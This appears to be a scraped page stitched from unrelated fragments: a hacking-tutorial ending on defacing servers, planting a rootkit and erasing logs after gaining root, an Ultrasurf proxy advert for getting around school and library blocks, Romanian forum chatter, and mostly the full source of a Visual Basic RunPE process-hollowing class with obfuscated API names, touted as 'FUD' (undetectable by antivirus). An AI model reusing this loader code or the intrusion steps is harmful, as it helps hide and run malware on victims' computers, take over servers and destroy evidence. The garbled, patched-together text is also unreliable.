root To check if we got root: id or whoami If it says root we got root! Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g. SSHDoor) and to take ssh/telnet shell access to the server. We must erase all logs in order to be safe with a log cleaner. A good cleaner for this job is the MIG Log Cleaner. <An@sA_StAxtH> <admin@cyberanarchy.org> * <www.cyberanarchy.org>

Ultrasurf V9.5 (100% Anonymous Surfing!) Privacy Protect Internet privacy with anonymous surfing and browsing -- hide IP addresses and locations, clean browsing history, cookies & more ... Security Completely transparent data transfer and high level encryption of the content allow you to surf the web with high security. Freedom UltraSurf allows you to overcome the censorship and blockage on the Internet. You can browse any website freely, so as to obtain true information from the free world. With this program you can change the proxies of internet explorer and can be tucked into the pages you have locked the computer administrators at such schools, libraries and other ... to operate the open and wait until To write successfully connected to server! then open the internet explorer go to any page you want and we are locked! You can also use it as normal and Proxy Server in Internet Explorer to surf 100% anonymously online. Download: http://www.mediafire.com/download.php?jyjtymyjyvm

Cine are chmod 777, folderul in care se afla toate fisierele?

Da, ea e, am fost la un concurs in Tg. Jiu si a fost si ea.

Asta e ea:

by Karcrack ( modded cobein's RunPE ) Native & Just RtlMoveMemory '--------------------------------------------------------------------------------------- ' Module : cNtPEL ' DateTime : 30/06/2009 06:32 ' Author : Cobein ' Mail : cobein27@hotmail.com ' WebPage : http://www.advancevb.com.ar (updated =D) ' Purpose : Inject Exe ' Usage : At your own risk ' Requirements: None ' Distribution: You can freely use this code in your own ' applications, but you may not reproduce ' or publish this code on any web site, ' online service, or distribute as source ' on any media without express permission. ' ' Thanks to : This is gonna be a looong list xD ' Batfitch - kernel base asm ' Karcrack - For helping me to debug and test it ' Paul Caton - vTable patch examples ' rm_code - First call api prototype ' and different books and pappers ' ' Compile : P-Code !!! ' ' Comments : Coded on top of the invoke module. ' ' History : 30/06/2009 First Cut.................................................... ' 02/08/2009 Modded By Karcrack, Now is NtRunPEL, thanks Slayer (;........ '--------------------------------------------------------------------------------------- Option Explicit Private Const IMAGE_DOS_SIGNATURE As Long = &H5A4D& Private Const IMAGE_NT_SIGNATURE As Long = &H4550& Private Const SIZE_DOS_HEADER As Long = &H40 Private Const SIZE_NT_HEADERS As Long = &HF8 Private Const SIZE_EXPORT_DIRECTORY As Long = &H28 Private Const SIZE_IMAGE_SECTION_HEADER As Long = &H28 Private Const THUNK_APICALL As String = "8B4C240851<PATCH1>E8<PATCH2>5989016631C0C3" Private Const THUNK_KERNELBASE As String = "8B5C240854B830000000648B008B400C8B401C8B008B400889035C31C0C3" Private Const PATCH1 As String = "<PATCH1>" Private Const PATCH2 As String = "<PATCH2>" Private Const CONTEXT_FULL As Long = &H10007 Private Const CREATE_SUSPENDED As Long = &H4 Private Const MEM_COMMIT As Long = &H1000 Private Const MEM_RESERVE As Long = &H2000 Private Const PAGE_EXECUTE_READWRITE As Long = &H40 Private Type STARTUPINFO cb As Long lpReserved As Long lpDesktop As Long lpTitle As Long dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Long hStdInput As Long hStdOutput As Long hStdError As Long End Type Private Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessID As Long dwThreadID As Long End Type Private Type FLOATING_SAVE_AREA ControlWord As Long StatusWord As Long TagWord As Long ErrorOffset As Long ErrorSelector As Long DataOffset As Long DataSelector As Long RegisterArea(1 To 80) As Byte Cr0NpxState As Long End Type Private Type CONTEXT ContextFlags As Long Dr0 As Long Dr1 As Long Dr2 As Long Dr3 As Long Dr6 As Long Dr7 As Long FloatSave As FLOATING_SAVE_AREA SegGs As Long SegFs As Long SegEs As Long SegDs As Long Edi As Long Esi As Long Ebx As Long Edx As Long Ecx As Long Eax As Long Ebp As Long Eip As Long SegCs As Long EFlags As Long Esp As Long SegSs As Long End Type Private Type IMAGE_DOS_HEADER e_magic As Integer e_cblp As Integer e_cp As Integer e_crlc As Integer e_cparhdr As Integer e_minalloc As Integer e_maxalloc As Integer e_ss As Integer e_sp As Integer e_csum As Integer e_ip As Integer e_cs As Integer e_lfarlc As Integer e_ovno As Integer e_res(0 To 3) As Integer e_oemid As Integer e_oeminfo As Integer e_res2(0 To 9) As Integer e_lfanew As Long End Type Private Type IMAGE_FILE_HEADER Machine As Integer NumberOfSections As Integer TimeDateStamp As Long PointerToSymbolTable As Long NumberOfSymbols As Long SizeOfOptionalHeader As Integer Characteristics As Integer End Type Private Type IMAGE_DATA_DIRECTORY VirtualAddress As Long Size As Long End Type Private Type IMAGE_OPTIONAL_HEADER Magic As Integer MajorLinkerVersion As Byte MinorLinkerVersion As Byte SizeOfCode As Long SizeOfInitializedData As Long SizeOfUnitializedData As Long AddressOfEntryPoint As Long BaseOfCode As Long BaseOfData As Long ImageBase As Long SectionAlignment As Long FileAlignment As Long MajorOperatingSystemVersion As Integer MinorOperatingSystemVersion As Integer MajorImageVersion As Integer MinorImageVersion As Integer MajorSubsystemVersion As Integer MinorSubsystemVersion As Integer W32VersionValue As Long SizeOfImage As Long SizeOfHeaders As Long CheckSum As Long SubSystem As Integer DllCharacteristics As Integer SizeOfStackReserve As Long SizeOfStackCommit As Long SizeOfHeapReserve As Long SizeOfHeapCommit As Long LoaderFlags As Long NumberOfRvaAndSizes As Long DataDirectory(0 To 15) As IMAGE_DATA_DIRECTORY End Type Private Type IMAGE_NT_HEADERS Signature As Long FileHeader As IMAGE_FILE_HEADER OptionalHeader As IMAGE_OPTIONAL_HEADER End Type Private Type IMAGE_EXPORT_DIRECTORY Characteristics As Long TimeDateStamp As Long MajorVersion As Integer MinorVersion As Integer lpName As Long Base As Long NumberOfFunctions As Long NumberOfNames As Long lpAddressOfFunctions As Long lpAddressOfNames As Long lpAddressOfNameOrdinals As Long End Type Private Type IMAGE_SECTION_HEADER SecName As String * 8 VirtualSize As Long VirtualAddress As Long SizeOfRawData As Long PointerToRawData As Long PointerToRelocations As Long PointerToLinenumbers As Long NumberOfRelocations As Integer NumberOfLinenumbers As Integer Characteristics As Long End Type Private Declare Sub CpyMem Lib "kernel32" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal dlen As Long) Private c_lKrnl As Long Private c_lLoadLib As Long Private c_bInit As Boolean Private c_lVTE As Long Private c_lOldVTE As Long Private c_bvASM(&HFF) As Byte Public Function zDoNotCall() As Long 'This function will be replaced with machine code laterz 'Do not add any public procedure on top of it End Function Public Function RunPE(ByRef bvBuff() As Byte, Optional sHost As String, Optional ByRef hProc As Long) As Boolean Dim i As Long Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS Dim tIMAGE_SECTION_HEADER As IMAGE_SECTION_HEADER Dim tSTARTUPINFO As STARTUPINFO Dim tPROCESS_INFORMATION As PROCESS_INFORMATION Dim tCONTEXT As CONTEXT Dim lKernel As Long Dim lNTDll As Long Dim lMod As Long If Not c_bInit Then Exit Function Call CpyMem(tIMAGE_DOS_HEADER, bvBuff(0), SIZE_DOS_HEADER) If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then Exit Function End If Call CpyMem(tIMAGE_NT_HEADERS, bvBuff(tIMAGE_DOS_HEADER.e_lfanew), SIZE_NT_HEADERS) If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then Exit Function End If 'kernel32 lKernel = LoadLibrary(nlfpkgnrj("6B65726E656C3332")) 'KPC 'ntdll lNTDll = LoadLibrary(nlfpkgnrj("6E74646C6C")) 'KPC If sHost = vbNullString Then sHost = Space(260) 'GetModuleFileNameW lMod = GetProcAddress(lKernel, nlfpkgnrj("4765744D6F64756C6546696C654E616D6557")) 'KPC Invoke lMod, App.hInstance, StrPtr(sHost), 260 End If With tIMAGE_NT_HEADERS.OptionalHeader tSTARTUPINFO.cb = Len(tSTARTUPINFO) 'CreateProcessW lMod = GetProcAddress(lKernel, nlfpkgnrj("43726561746550726F6365737357")) 'KPC Invoke lMod, 0, StrPtr(sHost), 0, 0, 0, CREATE_SUSPENDED, 0, 0, VarPtr(tSTARTUPINFO), VarPtr(tPROCESS_INFORMATION) 'NtUnmapViewOfSection lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74556E6D6170566965774F6653656374696F6E")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase 'VirtualAllocEx lMod = GetProcAddress(lKernel, nlfpkgnrj("5669727475616C416C6C6F634578")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, .SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE 'NtWriteVirtualMemory lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, VarPtr(bvBuff(0)), .SizeOfHeaders, 0 For i = 0 To tIMAGE_NT_HEADERS.FileHeader.NumberOfSections - 1 CpyMem tIMAGE_SECTION_HEADER, bvBuff(tIMAGE_DOS_HEADER.e_lfanew + SIZE_NT_HEADERS + SIZE_IMAGE_SECTION_HEADER * i), Len(tIMAGE_SECTION_HEADER) Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase + tIMAGE_SECTION_HEADER.VirtualAddress, VarPtr(bvBuff(tIMAGE_SECTION_HEADER.PointerToRawData)), tIMAGE_SECTION_HEADER.SizeOfRawData, 0 Next i tCONTEXT.ContextFlags = CONTEXT_FULL 'NtGetContextThread lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74476574436F6E74657874546872656164")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT) 'NtWriteVirtualMemory lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hProcess, tCONTEXT.Ebx + 8, VarPtr(.ImageBase), 4, 0 tCONTEXT.Eax = .ImageBase + .AddressOfEntryPoint 'NtSetContextThread lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74536574436F6E74657874546872656164")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT) 'NtResumeThread lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74526573756D65546872656164")) 'KPC Invoke lMod, tPROCESS_INFORMATION.hThread, 0 hProc = tPROCESS_INFORMATION.hProcess End With RunPE = True End Function Public Function Invoke(ByVal lMod As Long, ParamArray Params()) As Long Dim lPtr As Long Dim i As Long Dim sData As String Dim sParams As String If lMod = 0 Then Exit Function For i = UBound(Params) To 0 Step -1 sParams = sParams & "68" & GetLong(CLng(Params(i))) Next lPtr = VarPtr(c_bvASM(0)) lPtr = lPtr + (UBound(Params) + 2) * 5 lPtr = lMod - lPtr - 5 sData = THUNK_APICALL sData = Replace(sData, PATCH1, sParams) sData = Replace(sData, PATCH2, GetLong(lPtr)) Call PutThunk(sData) Invoke = PatchCall End Function Private Function GetLong(ByVal lData As Long) As String Dim bvTemp(3) As Byte Dim i As Long CpyMem bvTemp(0), lData, &H4 For i = 0 To 3 GetLong = GetLong & Right("0" & Hex(bvTemp(i)), 2) Next End Function Private Sub PutThunk(ByVal sThunk As String) Dim i As Long For i = 0 To Len(sThunk) - 1 Step 2 c_bvASM((i / 2)) = CByte("&h" & Mid$(sThunk, i + 1, 2)) Next i End Sub Private Function PatchCall() As Long CpyMem c_lVTE, ByVal ObjPtr(Me), &H4 c_lVTE = c_lVTE + &H1C CpyMem c_lOldVTE, ByVal c_lVTE, &H4 CpyMem ByVal c_lVTE, VarPtr(c_bvASM(0)), &H4 PatchCall = zDoNotCall CpyMem ByVal c_lVTE, c_lOldVTE, &H4 End Function Public Function GetMod(ByVal sLib As String, ByVal sProc As String) As Long GetMod = Me.GetProcAddress(Me.LoadLibrary(sLib), sProc) End Function Public Function LoadLibrary(ByVal sLib As String) As Long LoadLibrary = Invoke(c_lLoadLib, StrPtr(sLib & vbNullChar)) End Function Public Property Get Initialized() As Boolean Initialized = c_bInit End Property Public Sub Class_Initialize() Call PutThunk(THUNK_KERNELBASE) c_lKrnl = PatchCall If Not c_lKrnl = 0 Then c_lLoadLib = GetProcAddress(c_lKrnl, "LoadLibraryW") If Not c_lLoadLib = 0 Then c_bInit = True End If End If End Sub Public Function GetProcAddress(ByVal lMod As Long, ByVal sProc As String) As Long Dim tIMAGE_DOS_HEADER As IMAGE_DOS_HEADER Dim tIMAGE_NT_HEADERS As IMAGE_NT_HEADERS Dim tIMAGE_EXPORT_DIRECTORY As IMAGE_EXPORT_DIRECTORY Call CpyMem(tIMAGE_DOS_HEADER, ByVal lMod, SIZE_DOS_HEADER) If Not tIMAGE_DOS_HEADER.e_magic = IMAGE_DOS_SIGNATURE Then Exit Function End If Call CpyMem(tIMAGE_NT_HEADERS, ByVal lMod + tIMAGE_DOS_HEADER.e_lfanew, SIZE_NT_HEADERS) If Not tIMAGE_NT_HEADERS.Signature = IMAGE_NT_SIGNATURE Then Exit Function End If Dim lVAddress As Long Dim lVSize As Long Dim lBase As Long With tIMAGE_NT_HEADERS.OptionalHeader lVAddress = lMod + .DataDirectory(0).VirtualAddress lVSize = lVAddress + .DataDirectory(0).Size lBase = .ImageBase End With Call CpyMem(tIMAGE_EXPORT_DIRECTORY, ByVal lVAddress, SIZE_EXPORT_DIRECTORY) Dim i As Long Dim lFunctAdd As Long Dim lNameAdd As Long Dim lNumbAdd As Long With tIMAGE_EXPORT_DIRECTORY For i = 0 To .NumberOfNames - 1 CpyMem lNameAdd, ByVal lBase + .lpAddressOfNames + i * 4, 4 If StringFromPtr(lBase + lNameAdd) = sProc Then CpyMem lNumbAdd, ByVal lBase + .lpAddressOfNameOrdinals + i * 2, 2 CpyMem lFunctAdd, ByVal lBase + .lpAddressOfFunctions + lNumbAdd * 4, 4 GetProcAddress = lFunctAdd + lBase If GetProcAddress >= lVAddress And _ GetProcAddress <= lVSize Then Call ResolveForward(GetProcAddress, lMod, sProc) If Not lMod = 0 Then GetProcAddress = GetProcAddress(lMod, sProc) Else GetProcAddress = 0 End If End If Exit Function End If Next End With End Function Private Function ResolveForward( _ ByVal lAddress As Long, _ ByRef lLib As Long, _ ByRef sMod As String) Dim sForward As String sForward = StringFromPtr(lAddress) If InStr(1, sForward, ".") Then lLib = LoadLibrary(Split(sForward, ".")(0)) sMod = Split(sForward, ".")(1) End If End Function Private Function StringFromPtr( _ ByVal lAddress As Long) As String Dim bChar As Byte Do CpyMem bChar, ByVal lAddress, 1 lAddress = lAddress + 1 If bChar = 0 Then Exit Do StringFromPtr = StringFromPtr & Chr$(bChar) Loop End Function Private Function nlfpkgnrj(ByVal sData As String) As String Dim i As Long For i = 1 To Len(sData) Step 2 nlfpkgnrj = nlfpkgnrj & Chr$(Val("&H" & Mid$(sData, i, 2))) Next i End Function That modded version uses Native APIs (Thanks Slayer ) and loads APIs on runtime... Of course, its FUD... ALL CREDITS FOR COBEIN!!! BTW, Its a class module (*.cls)